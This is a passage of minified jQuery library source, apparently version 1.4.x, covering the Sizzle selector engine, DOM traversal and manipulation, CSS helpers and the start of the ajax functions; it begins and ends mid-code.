k){y=l[t.sizset];break}if(t.nodeType===1){if(!p){t.sizcache=k;t.sizset=q}if(typeof h!=="string"){if(t===h){y=true;break}}else if(o.filter(h,[t]).length>0){y=t;break}}t=t[g]}l[q]=y}}}var f=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,e=0,i=Object.prototype.toString,j=false,n=true;[0,0].sort(function(){n=false;return 0});var o=function(g,h,k,l){k=k||[];var q=h=h||r;if(h.nodeType!==1&&h.nodeType!==9)return[];if(!g||
typeof g!=="string")return k;for(var p=[],u,t,y,R,H=true,M=w(h),I=g;(f.exec(""),u=f.exec(I))!==null;){I=u[3];p.push(u[1]);if(u[2]){R=u[3];break}}if(p.length>1&&s.exec(g))if(p.length===2&&m.relative[p[0]])t=fa(p[0]+p[1],h);else for(t=m.relative[p[0]]?[h]:o(p.shift(),h);p.length;){g=p.shift();if(m.relative[g])g+=p.shift();t=fa(g,t)}else{if(!l&&p.length>1&&h.nodeType===9&&!M&&m.match.ID.test(p[0])&&!m.match.ID.test(p[p.length-1])){u=o.find(p.shift(),h,M);h=u.expr?o.filter(u.expr,u.set)[0]:u.set[0]}if(h){u=
l?{expr:p.pop(),set:A(l)}:o.find(p.pop(),p.length===1&&(p[0]==="~"||p[0]==="+")&&h.parentNode?h.parentNode:h,M);t=u.expr?o.filter(u.expr,u.set):u.set;if(p.length>0)y=A(t);else H=false;for(;p.length;){var D=p.pop();u=D;if(m.relative[D])u=p.pop();else D="";if(u==null)u=h;m.relative[D](y,u,M)}}else y=[]}y||(y=t);y||o.error(D||g);if(i.call(y)==="[object Array]")if(H)if(h&&h.nodeType===1)for(g=0;y[g]!=null;g++){if(y[g]&&(y[g]===true||y[g].nodeType===1&&E(h,y[g])))k.push(t[g])}else for(g=0;y[g]!=null;g++)y[g]&&
y[g].nodeType===1&&k.push(t[g]);else k.push.apply(k,y);else A(y,k);if(R){o(R,q,k,l);o.uniqueSort(k)}return k};o.uniqueSort=function(g){if(C){j=n;g.sort(C);if(j)for(var h=1;h<g.length;h++)g[h]===g[h-1]&&g.splice(h--,1)}return g};o.matches=function(g,h){return o(g,null,null,h)};o.find=function(g,h,k){var l,q;if(!g)return[];for(var p=0,u=m.order.length;p<u;p++){var t=m.order[p];if(q=m.leftMatch[t].exec(g)){var y=q[1];q.splice(1,1);if(y.substr(y.length-1)!=="\\"){q[1]=(q[1]||"").replace(/\\/g,"");l=m.find[t](q,
h,k);if(l!=null){g=g.replace(m.match[t],"");break}}}}l||(l=h.getElementsByTagName("*"));return{set:l,expr:g}};o.filter=function(g,h,k,l){for(var q=g,p=[],u=h,t,y,R=h&&h[0]&&w(h[0]);g&&h.length;){for(var H in m.filter)if((t=m.leftMatch[H].exec(g))!=null&&t[2]){var M=m.filter[H],I,D;D=t[1];y=false;t.splice(1,1);if(D.substr(D.length-1)!=="\\"){if(u===p)p=[];if(m.preFilter[H])if(t=m.preFilter[H](t,u,k,p,l,R)){if(t===true)continue}else y=I=true;if(t)for(var U=0;(D=u[U])!=null;U++)if(D){I=M(D,t,U,u);var Da=
l^!!I;if(k&&I!=null)if(Da)y=true;else u[U]=false;else if(Da){p.push(D);y=true}}if(I!==v){k||(u=p);g=g.replace(m.match[H],"");if(!y)return[];break}}}if(g===q)if(y==null)o.error(g);else break;q=g}return u};o.error=function(g){throw"Syntax error, unrecognized expression: "+g;};var m=o.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,
TAG:/^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(g){return g.getAttribute("href")}},relative:{"+":function(g,h){var k=typeof h==="string",l=k&&!/\W/.test(h);k=k&&!l;if(l)h=h.toLowerCase();l=0;for(var q=g.length,
p;l<q;l++)if(p=g[l]){for(;(p=p.previousSibling)&&p.nodeType!==1;);g[l]=k||p&&p.nodeName.toLowerCase()===h?p||false:p===h}k&&o.filter(h,g,true)},">":function(g,h){var k=typeof h==="string";if(k&&!/\W/.test(h)){h=h.toLowerCase();for(var l=0,q=g.length;l<q;l++){var p=g[l];if(p){k=p.parentNode;g[l]=k.nodeName.toLowerCase()===h?k:false}}}else{l=0;for(q=g.length;l<q;l++)if(p=g[l])g[l]=k?p.parentNode:p.parentNode===h;k&&o.filter(h,g,true)}},"":function(g,h,k){var l=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=
h=h.toLowerCase();q=b}q("parentNode",h,l,g,p,k)},"~":function(g,h,k){var l=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("previousSibling",h,l,g,p,k)}},find:{ID:function(g,h,k){if(typeof h.getElementById!=="undefined"&&!k)return(g=h.getElementById(g[1]))?[g]:[]},NAME:function(g,h){if(typeof h.getElementsByName!=="undefined"){var k=[];h=h.getElementsByName(g[1]);for(var l=0,q=h.length;l<q;l++)h[l].getAttribute("name")===g[1]&&k.push(h[l]);return k.length===0?null:k}},
TAG:function(g,h){return h.getElementsByTagName(g[1])}},preFilter:{CLASS:function(g,h,k,l,q,p){g=" "+g[1].replace(/\\/g,"")+" ";if(p)return g;p=0;for(var u;(u=h[p])!=null;p++)if(u)if(q^(u.className&&(" "+u.className+" ").replace(/[\t\n]/g," ").indexOf(g)>=0))k||l.push(u);else if(k)h[p]=false;return false},ID:function(g){return g[1].replace(/\\/g,"")},TAG:function(g){return g[1].toLowerCase()},CHILD:function(g){if(g[1]==="nth"){var h=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(g[2]==="even"&&"2n"||g[2]==="odd"&&
"2n+1"||!/\D/.test(g[2])&&"0n+"+g[2]||g[2]);g[2]=h[1]+(h[2]||1)-0;g[3]=h[3]-0}g[0]=e++;return g},ATTR:function(g,h,k,l,q,p){h=g[1].replace(/\\/g,"");if(!p&&m.attrMap[h])g[1]=m.attrMap[h];if(g[2]==="~=")g[4]=" "+g[4]+" ";return g},PSEUDO:function(g,h,k,l,q){if(g[1]==="not")if((f.exec(g[3])||"").length>1||/^\w/.test(g[3]))g[3]=o(g[3],null,null,h);else{g=o.filter(g[3],h,k,true^q);k||l.push.apply(l,g);return false}else if(m.match.POS.test(g[0])||m.match.CHILD.test(g[0]))return true;return g},POS:function(g){g.unshift(true);
return g}},filters:{enabled:function(g){return g.disabled===false&&g.type!=="hidden"},disabled:function(g){return g.disabled===true},checked:function(g){return g.checked===true},selected:function(g){return g.selected===true},parent:function(g){return!!g.firstChild},empty:function(g){return!g.firstChild},has:function(g,h,k){return!!o(k[3],g).length},header:function(g){return/h\d/i.test(g.nodeName)},text:function(g){return"text"===g.type},radio:function(g){return"radio"===g.type},checkbox:function(g){return"checkbox"===
g.type},file:function(g){return"file"===g.type},password:function(g){return"password"===g.type},submit:function(g){return"submit"===g.type},image:function(g){return"image"===g.type},reset:function(g){return"reset"===g.type},button:function(g){return"button"===g.type||g.nodeName.toLowerCase()==="button"},input:function(g){return/input|select|textarea|button/i.test(g.nodeName)}},setFilters:{first:function(g,h){return h===0},last:function(g,h,k,l){return h===l.length-1},even:function(g,h){return h%2===
0},odd:function(g,h){return h%2===1},lt:function(g,h,k){return h<k[3]-0},gt:function(g,h,k){return h>k[3]-0},nth:function(g,h,k){return k[3]-0===h},eq:function(g,h,k){return k[3]-0===h}},filter:{PSEUDO:function(g,h,k,l){var q=h[1],p=m.filters[q];if(p)return p(g,k,h,l);else if(q==="contains")return(g.textContent||g.innerText||a([g])||"").indexOf(h[3])>=0;else if(q==="not"){h=h[3];k=0;for(l=h.length;k<l;k++)if(h[k]===g)return false;return true}else o.error("Syntax error, unrecognized expression: "+
q)},CHILD:function(g,h){var k=h[1],l=g;switch(k){case "only":case "first":for(;l=l.previousSibling;)if(l.nodeType===1)return false;if(k==="first")return true;l=g;case "last":for(;l=l.nextSibling;)if(l.nodeType===1)return false;return true;case "nth":k=h[2];var q=h[3];if(k===1&&q===0)return true;h=h[0];var p=g.parentNode;if(p&&(p.sizcache!==h||!g.nodeIndex)){var u=0;for(l=p.firstChild;l;l=l.nextSibling)if(l.nodeType===1)l.nodeIndex=++u;p.sizcache=h}g=g.nodeIndex-q;return k===0?g===0:g%k===0&&g/k>=
0}},ID:function(g,h){return g.nodeType===1&&g.getAttribute("id")===h},TAG:function(g,h){return h==="*"&&g.nodeType===1||g.nodeName.toLowerCase()===h},CLASS:function(g,h){return(" "+(g.className||g.getAttribute("class"))+" ").indexOf(h)>-1},ATTR:function(g,h){var k=h[1];g=m.attrHandle[k]?m.attrHandle[k](g):g[k]!=null?g[k]:g.getAttribute(k);k=g+"";var l=h[2];h=h[4];return g==null?l==="!=":l==="="?k===h:l==="*="?k.indexOf(h)>=0:l==="~="?(" "+k+" ").indexOf(h)>=0:!h?k&&g!==false:l==="!="?k!==h:l==="^="?
k.indexOf(h)===0:l==="$="?k.substr(k.length-h.length)===h:l==="|="?k===h||k.substr(0,h.length+1)===h+"-":false},POS:function(g,h,k,l){var q=m.setFilters[h[2]];if(q)return q(g,k,h,l)}}},s=m.match.POS;for(var x in m.match){m.match[x]=new RegExp(m.match[x].source+/(?![^\[]*\])(?![^\(]*\))/.source);m.leftMatch[x]=new RegExp(/(^(?:.|\r|\n)*?)/.source+m.match[x].source.replace(/\\(\d+)/g,function(g,h){return"\\"+(h-0+1)}))}var A=function(g,h){g=Array.prototype.slice.call(g,0);if(h){h.push.apply(h,g);return h}return g};
try{Array.prototype.slice.call(r.documentElement.childNodes,0)}catch(B){A=function(g,h){h=h||[];if(i.call(g)==="[object Array]")Array.prototype.push.apply(h,g);else if(typeof g.length==="number")for(var k=0,l=g.length;k<l;k++)h.push(g[k]);else for(k=0;g[k];k++)h.push(g[k]);return h}}var C;if(r.documentElement.compareDocumentPosition)C=function(g,h){if(!g.compareDocumentPosition||!h.compareDocumentPosition){if(g==h)j=true;return g.compareDocumentPosition?-1:1}g=g.compareDocumentPosition(h)&4?-1:g===
h?0:1;if(g===0)j=true;return g};else if("sourceIndex"in r.documentElement)C=function(g,h){if(!g.sourceIndex||!h.sourceIndex){if(g==h)j=true;return g.sourceIndex?-1:1}g=g.sourceIndex-h.sourceIndex;if(g===0)j=true;return g};else if(r.createRange)C=function(g,h){if(!g.ownerDocument||!h.ownerDocument){if(g==h)j=true;return g.ownerDocument?-1:1}var k=g.ownerDocument.createRange(),l=h.ownerDocument.createRange();k.setStart(g,0);k.setEnd(g,0);l.setStart(h,0);l.setEnd(h,0);g=k.compareBoundaryPoints(Range.START_TO_END,
l);if(g===0)j=true;return g};(function(){var g=r.createElement("div"),h="script"+(new Date).getTime();g.innerHTML="<a name='"+h+"'/>";var k=r.documentElement;k.insertBefore(g,k.firstChild);if(r.getElementById(h)){m.find.ID=function(l,q,p){if(typeof q.getElementById!=="undefined"&&!p)return(q=q.getElementById(l[1]))?q.id===l[1]||typeof q.getAttributeNode!=="undefined"&&q.getAttributeNode("id").nodeValue===l[1]?[q]:v:[]};m.filter.ID=function(l,q){var p=typeof l.getAttributeNode!=="undefined"&&l.getAttributeNode("id");
return l.nodeType===1&&p&&p.nodeValue===q}}k.removeChild(g);k=g=null})();(function(){var g=r.createElement("div");g.appendChild(r.createComment(""));if(g.getElementsByTagName("*").length>0)m.find.TAG=function(h,k){k=k.getElementsByTagName(h[1]);if(h[1]==="*"){h=[];for(var l=0;k[l];l++)k[l].nodeType===1&&h.push(k[l]);k=h}return k};g.innerHTML="<a href='#'></a>";if(g.firstChild&&typeof g.firstChild.getAttribute!=="undefined"&&g.firstChild.getAttribute("href")!=="#")m.attrHandle.href=function(h){return h.getAttribute("href",
2)};g=null})();r.querySelectorAll&&function(){var g=o,h=r.createElement("div");h.innerHTML="<p class='TEST'></p>";if(!(h.querySelectorAll&&h.querySelectorAll(".TEST").length===0)){o=function(l,q,p,u){q=q||r;if(!u&&q.nodeType===9&&!w(q))try{return A(q.querySelectorAll(l),p)}catch(t){}return g(l,q,p,u)};for(var k in g)o[k]=g[k];h=null}}();(function(){var g=r.createElement("div");g.innerHTML="<div class='test e'></div><div class='test'></div>";if(!(!g.getElementsByClassName||g.getElementsByClassName("e").length===
0)){g.lastChild.className="e";if(g.getElementsByClassName("e").length!==1){m.order.splice(1,0,"CLASS");m.find.CLASS=function(h,k,l){if(typeof k.getElementsByClassName!=="undefined"&&!l)return k.getElementsByClassName(h[1])};g=null}}})();var E=r.compareDocumentPosition?function(g,h){return g.compareDocumentPosition(h)&16}:function(g,h){return g!==h&&(g.contains?g.contains(h):true)},w=function(g){return(g=(g?g.ownerDocument||g:0).documentElement)?g.nodeName!=="HTML":false},fa=function(g,h){var k=[],
l="",q;for(h=h.nodeType?[h]:h;q=m.match.PSEUDO.exec(g);){l+=q[0];g=g.replace(m.match.PSEUDO,"")}g=m.relative[g]?g+"*":g;q=0;for(var p=h.length;q<p;q++)o(g,h[q],k);return o.filter(l,k)};c.find=o;c.expr=o.selectors;c.expr[":"]=c.expr.filters;c.unique=o.uniqueSort;c.getText=a;c.isXMLDoc=w;c.contains=E})();var bb=/Until$/,cb=/^(?:parents|prevUntil|prevAll)/,db=/,/;Q=Array.prototype.slice;var Ea=function(a,b,d){if(c.isFunction(b))return c.grep(a,function(e,i){return!!b.call(e,i,e)===d});else if(b.nodeType)return c.grep(a,
function(e){return e===b===d});else if(typeof b==="string"){var f=c.grep(a,function(e){return e.nodeType===1});if(Qa.test(b))return c.filter(b,f,!d);else b=c.filter(b,f)}return c.grep(a,function(e){return c.inArray(e,b)>=0===d})};c.fn.extend({find:function(a){for(var b=this.pushStack("","find",a),d=0,f=0,e=this.length;f<e;f++){d=b.length;c.find(a,this[f],b);if(f>0)for(var i=d;i<b.length;i++)for(var j=0;j<d;j++)if(b[j]===b[i]){b.splice(i--,1);break}}return b},has:function(a){var b=c(a);return this.filter(function(){for(var d=
0,f=b.length;d<f;d++)if(c.contains(this,b[d]))return true})},not:function(a){return this.pushStack(Ea(this,a,false),"not",a)},filter:function(a){return this.pushStack(Ea(this,a,true),"filter",a)},is:function(a){return!!a&&c.filter(a,this).length>0},closest:function(a,b){if(c.isArray(a)){var d=[],f=this[0],e,i={},j;if(f&&a.length){e=0;for(var n=a.length;e<n;e++){j=a[e];i[j]||(i[j]=c.expr.match.POS.test(j)?c(j,b||this.context):j)}for(;f&&f.ownerDocument&&f!==b;){for(j in i){e=i[j];if(e.jquery?e.index(f)>
-1:c(f).is(e)){d.push({selector:j,elem:f});delete i[j]}}f=f.parentNode}}return d}var o=c.expr.match.POS.test(a)?c(a,b||this.context):null;return this.map(function(m,s){for(;s&&s.ownerDocument&&s!==b;){if(o?o.index(s)>-1:c(s).is(a))return s;s=s.parentNode}return null})},index:function(a){if(!a||typeof a==="string")return c.inArray(this[0],a?c(a):this.parent().children());return c.inArray(a.jquery?a[0]:a,this)},add:function(a,b){a=typeof a==="string"?c(a,b||this.context):c.makeArray(a);b=c.merge(this.get(),
a);return this.pushStack(pa(a[0])||pa(b[0])?b:c.unique(b))},andSelf:function(){return this.add(this.prevObject)}});c.each({parent:function(a){return(a=a.parentNode)&&a.nodeType!==11?a:null},parents:function(a){return c.dir(a,"parentNode")},parentsUntil:function(a,b,d){return c.dir(a,"parentNode",d)},next:function(a){return c.nth(a,2,"nextSibling")},prev:function(a){return c.nth(a,2,"previousSibling")},nextAll:function(a){return c.dir(a,"nextSibling")},prevAll:function(a){return c.dir(a,"previousSibling")},
nextUntil:function(a,b,d){return c.dir(a,"nextSibling",d)},prevUntil:function(a,b,d){return c.dir(a,"previousSibling",d)},siblings:function(a){return c.sibling(a.parentNode.firstChild,a)},children:function(a){return c.sibling(a.firstChild)},contents:function(a){return c.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:c.makeArray(a.childNodes)}},function(a,b){c.fn[a]=function(d,f){var e=c.map(this,b,d);bb.test(a)||(f=d);if(f&&typeof f==="string")e=c.filter(f,e);e=this.length>1?c.unique(e):
e;if((this.length>1||db.test(f))&&cb.test(a))e=e.reverse();return this.pushStack(e,a,Q.call(arguments).join(","))}});c.extend({filter:function(a,b,d){if(d)a=":not("+a+")";return c.find.matches(a,b)},dir:function(a,b,d){var f=[];for(a=a[b];a&&a.nodeType!==9&&(d===v||a.nodeType!==1||!c(a).is(d));){a.nodeType===1&&f.push(a);a=a[b]}return f},nth:function(a,b,d){b=b||1;for(var f=0;a;a=a[d])if(a.nodeType===1&&++f===b)break;return a},sibling:function(a,b){for(var d=[];a;a=a.nextSibling)a.nodeType===1&&a!==
b&&d.push(a);return d}});var Fa=/ jQuery\d+="(?:\d+|null)"/g,V=/^\s+/,Ga=/(<([\w:]+)[^>]*?)\/>/g,eb=/^(?:area|br|col|embed|hr|img|input|link|meta|param)$/i,Ha=/<([\w:]+)/,fb=/<tbody/i,gb=/<|&\w+;/,sa=/checked\s*(?:[^=]|=\s*.checked.)/i,Ia=function(a,b,d){return eb.test(d)?a:b+"></"+d+">"},F={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],
col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};F.optgroup=F.option;F.tbody=F.tfoot=F.colgroup=F.caption=F.thead;F.th=F.td;if(!c.support.htmlSerialize)F._default=[1,"div<div>","</div>"];c.fn.extend({text:function(a){if(c.isFunction(a))return this.each(function(b){var d=c(this);d.text(a.call(this,b,d.text()))});if(typeof a!=="object"&&a!==v)return this.empty().append((this[0]&&this[0].ownerDocument||r).createTextNode(a));return c.getText(this)},
wrapAll:function(a){if(c.isFunction(a))return this.each(function(d){c(this).wrapAll(a.call(this,d))});if(this[0]){var b=c(a,this[0].ownerDocument).eq(0).clone(true);this[0].parentNode&&b.insertBefore(this[0]);b.map(function(){for(var d=this;d.firstChild&&d.firstChild.nodeType===1;)d=d.firstChild;return d}).append(this)}return this},wrapInner:function(a){if(c.isFunction(a))return this.each(function(b){c(this).wrapInner(a.call(this,b))});return this.each(function(){var b=c(this),d=b.contents();d.length?
d.wrapAll(a):b.append(a)})},wrap:function(a){return this.each(function(){c(this).wrapAll(a)})},unwrap:function(){return this.parent().each(function(){c.nodeName(this,"body")||c(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.appendChild(a)})},prepend:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,
false,function(b){this.parentNode.insertBefore(b,this)});else if(arguments.length){var a=c(arguments[0]);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,this.nextSibling)});else if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,c(arguments[0]).toArray());return a}},clone:function(a){var b=this.map(function(){if(!c.support.noCloneEvent&&
!c.isXMLDoc(this)){var d=this.outerHTML,f=this.ownerDocument;if(!d){d=f.createElement("div");d.appendChild(this.cloneNode(true));d=d.innerHTML}return c.clean([d.replace(Fa,"").replace(V,"")],f)[0]}else return this.cloneNode(true)});if(a===true){qa(this,b);qa(this.find("*"),b.find("*"))}return b},html:function(a){if(a===v)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(Fa,""):null;else if(typeof a==="string"&&!/<script/i.test(a)&&(c.support.leadingWhitespace||!V.test(a))&&!F[(Ha.exec(a)||
["",""])[1].toLowerCase()]){a=a.replace(Ga,Ia);try{for(var b=0,d=this.length;b<d;b++)if(this[b].nodeType===1){c.cleanData(this[b].getElementsByTagName("*"));this[b].innerHTML=a}}catch(f){this.empty().append(a)}}else c.isFunction(a)?this.each(function(e){var i=c(this),j=i.html();i.empty().append(function(){return a.call(this,e,j)})}):this.empty().append(a);return this},replaceWith:function(a){if(this[0]&&this[0].parentNode){if(c.isFunction(a))return this.each(function(b){var d=c(this),f=d.html();d.replaceWith(a.call(this,
b,f))});else a=c(a).detach();return this.each(function(){var b=this.nextSibling,d=this.parentNode;c(this).remove();b?c(b).before(a):c(d).append(a)})}else return this.pushStack(c(c.isFunction(a)?a():a),"replaceWith",a)},detach:function(a){return this.remove(a,true)},domManip:function(a,b,d){function f(s){return c.nodeName(s,"table")?s.getElementsByTagName("tbody")[0]||s.appendChild(s.ownerDocument.createElement("tbody")):s}var e,i,j=a[0],n=[];if(!c.support.checkClone&&arguments.length===3&&typeof j===
"string"&&sa.test(j))return this.each(function(){c(this).domManip(a,b,d,true)});if(c.isFunction(j))return this.each(function(s){var x=c(this);a[0]=j.call(this,s,b?x.html():v);x.domManip(a,b,d)});if(this[0]){e=a[0]&&a[0].parentNode&&a[0].parentNode.nodeType===11?{fragment:a[0].parentNode}:ra(a,this,n);if(i=e.fragment.firstChild){b=b&&c.nodeName(i,"tr");for(var o=0,m=this.length;o<m;o++)d.call(b?f(this[o],i):this[o],e.cacheable||this.length>1||o>0?e.fragment.cloneNode(true):e.fragment)}n&&c.each(n,
Ma)}return this}});c.fragments={};c.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){c.fn[a]=function(d){var f=[];d=c(d);for(var e=0,i=d.length;e<i;e++){var j=(e>0?this.clone(true):this).get();c.fn[b].apply(c(d[e]),j);f=f.concat(j)}return this.pushStack(f,a,d.selector)}});c.each({remove:function(a,b){if(!a||c.filter(a,[this]).length){if(!b&&this.nodeType===1){c.cleanData(this.getElementsByTagName("*"));c.cleanData([this])}this.parentNode&&
this.parentNode.removeChild(this)}},empty:function(){for(this.nodeType===1&&c.cleanData(this.getElementsByTagName("*"));this.firstChild;)this.removeChild(this.firstChild)}},function(a,b){c.fn[a]=function(){return this.each(b,arguments)}});c.extend({clean:function(a,b,d,f){b=b||r;if(typeof b.createElement==="undefined")b=b.ownerDocument||b[0]&&b[0].ownerDocument||r;var e=[];c.each(a,function(i,j){if(typeof j==="number")j+="";if(j){if(typeof j==="string"&&!gb.test(j))j=b.createTextNode(j);else if(typeof j===
"string"){j=j.replace(Ga,Ia);var n=(Ha.exec(j)||["",""])[1].toLowerCase(),o=F[n]||F._default,m=o[0];i=b.createElement("div");for(i.innerHTML=o[1]+j+o[2];m--;)i=i.lastChild;if(!c.support.tbody){m=fb.test(j);n=n==="table"&&!m?i.firstChild&&i.firstChild.childNodes:o[1]==="<table>"&&!m?i.childNodes:[];for(o=n.length-1;o>=0;--o)c.nodeName(n[o],"tbody")&&!n[o].childNodes.length&&n[o].parentNode.removeChild(n[o])}!c.support.leadingWhitespace&&V.test(j)&&i.insertBefore(b.createTextNode(V.exec(j)[0]),i.firstChild);
j=c.makeArray(i.childNodes)}if(j.nodeType)e.push(j);else e=c.merge(e,j)}});if(d)for(a=0;e[a];a++)if(f&&c.nodeName(e[a],"script")&&(!e[a].type||e[a].type.toLowerCase()==="text/javascript"))f.push(e[a].parentNode?e[a].parentNode.removeChild(e[a]):e[a]);else{e[a].nodeType===1&&e.splice.apply(e,[a+1,0].concat(c.makeArray(e[a].getElementsByTagName("script"))));d.appendChild(e[a])}return e},cleanData:function(a){for(var b=0,d;(d=a[b])!=null;b++){c.event.remove(d);c.removeData(d)}}});var hb=/z-?index|font-?weight|opacity|zoom|line-?height/i,
Ja=/alpha\([^)]*\)/,Ka=/opacity=([^)]*)/,ga=/float/i,ha=/-([a-z])/ig,ib=/([A-Z])/g,jb=/^-?\d+(?:px)?$/i,kb=/^-?\d/,lb={position:"absolute",visibility:"hidden",display:"block"},mb=["Left","Right"],nb=["Top","Bottom"],ob=r.defaultView&&r.defaultView.getComputedStyle,La=c.support.cssFloat?"cssFloat":"styleFloat",ia=function(a,b){return b.toUpperCase()};c.fn.css=function(a,b){return X(this,a,b,true,function(d,f,e){if(e===v)return c.curCSS(d,f);if(typeof e==="number"&&!hb.test(f))e+="px";c.style(d,f,e)})};
c.extend({style:function(a,b,d){if(!a||a.nodeType===3||a.nodeType===8)return v;if((b==="width"||b==="height")&&parseFloat(d)<0)d=v;var f=a.style||a,e=d!==v;if(!c.support.opacity&&b==="opacity"){if(e){f.zoom=1;b=parseInt(d,10)+""==="NaN"?"":"alpha(opacity="+d*100+")";a=f.filter||c.curCSS(a,"filter")||"";f.filter=Ja.test(a)?a.replace(Ja,b):b}return f.filter&&f.filter.indexOf("opacity=")>=0?parseFloat(Ka.exec(f.filter)[1])/100+"":""}if(ga.test(b))b=La;b=b.replace(ha,ia);if(e)f[b]=d;return f[b]},css:function(a,
b,d,f){if(b==="width"||b==="height"){var e,i=b==="width"?mb:nb;function j(){e=b==="width"?a.offsetWidth:a.offsetHeight;f!=="border"&&c.each(i,function(){f||(e-=parseFloat(c.curCSS(a,"padding"+this,true))||0);if(f==="margin")e+=parseFloat(c.curCSS(a,"margin"+this,true))||0;else e-=parseFloat(c.curCSS(a,"border"+this+"Width",true))||0})}a.offsetWidth!==0?j():c.swap(a,lb,j);return Math.max(0,Math.round(e))}return c.curCSS(a,b,d)},curCSS:function(a,b,d){var f,e=a.style;if(!c.support.opacity&&b==="opacity"&&
a.currentStyle){f=Ka.test(a.currentStyle.filter||"")?parseFloat(RegExp.$1)/100+"":"";return f===""?"1":f}if(ga.test(b))b=La;if(!d&&e&&e[b])f=e[b];else if(ob){if(ga.test(b))b="float";b=b.replace(ib,"-$1").toLowerCase();e=a.ownerDocument.defaultView;if(!e)return null;if(a=e.getComputedStyle(a,null))f=a.getPropertyValue(b);if(b==="opacity"&&f==="")f="1"}else if(a.currentStyle){d=b.replace(ha,ia);f=a.currentStyle[b]||a.currentStyle[d];if(!jb.test(f)&&kb.test(f)){b=e.left;var i=a.runtimeStyle.left;a.runtimeStyle.left=
a.currentStyle.left;e.left=d==="fontSize"?"1em":f||0;f=e.pixelLeft+"px";e.left=b;a.runtimeStyle.left=i}}return f},swap:function(a,b,d){var f={};for(var e in b){f[e]=a.style[e];a.style[e]=b[e]}d.call(a);for(e in b)a.style[e]=f[e]}});if(c.expr&&c.expr.filters){c.expr.filters.hidden=function(a){var b=a.offsetWidth,d=a.offsetHeight,f=a.nodeName.toLowerCase()==="tr";return b===0&&d===0&&!f?true:b>0&&d>0&&!f?false:c.curCSS(a,"display")==="none"};c.expr.filters.visible=function(a){return!c.expr.filters.hidden(a)}}var pb=
J(),qb=/<script(.|\s)*?\/script>/gi,rb=/select|textarea/i,sb=/color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week/i,N=/=\?(&|$)/,ja=/\?/,tb=/(\?|&)_=.*?(&|$)/,ub=/^(\w+:)?\/\/([^\/?#]+)/,vb=/%20/g;c.fn.extend({_load:c.fn.load,load:function(a,b,d){if(typeof a!=="string")return this._load(a);else if(!this.length)return this;var f=a.indexOf(" ");if(f>=0){var e=a.slice(f,a.length);a=a.slice(0,f)}f="GET";if(b)if(c.isFunction(b)){d=b;b=null}else if(typeof b==="object"){b=
c.param(b,c.ajaxSettings.traditional);f="POST"}var i=this;c.ajax({url:a,type:f,dataType:"html",data:b,complete:function(j,n){if(n==="success"||n==="notmodified")i.html(e?c("<div />").append(j.responseText.replace(qb,"")).find(e):j.responseText);d&&i.each(d,[j.responseText,n,j])}});return this},serialize:function(){return c.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?c.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&
(this.checked||rb.test(this.nodeName)||sb.test(this.type))}).map(function(a,b){a=c(this).val();return a==null?null:c.isArray(a)?c.map(a,function(d){return{name:b.name,value:d}}):{name:b.name,value:a}}).get()}});c.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(a,b){c.fn[b]=function(d){return this.bind(b,d)}});c.extend({get:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b=null}return c.ajax({type:"GET",url:a,data:b,success:d,dataType:f})},getScript:function(a,
b){return c.get(a,null,b,"script")},getJSON:function(a,b,d){return c.get(a,b,d,"json")},post:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b={}}return c.ajax({type:"POST",url:a,data:b,success:d,dataType:f})},ajaxSetup:function(a){c.extend(c.ajaxSettings,a)},ajaxSettings:{url:location.href,global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:z.XMLHttpRequest&&(z.location.protocol!=="file:"||!z.ActiveXObject)?function(){return new z.XMLHttpRequest}:
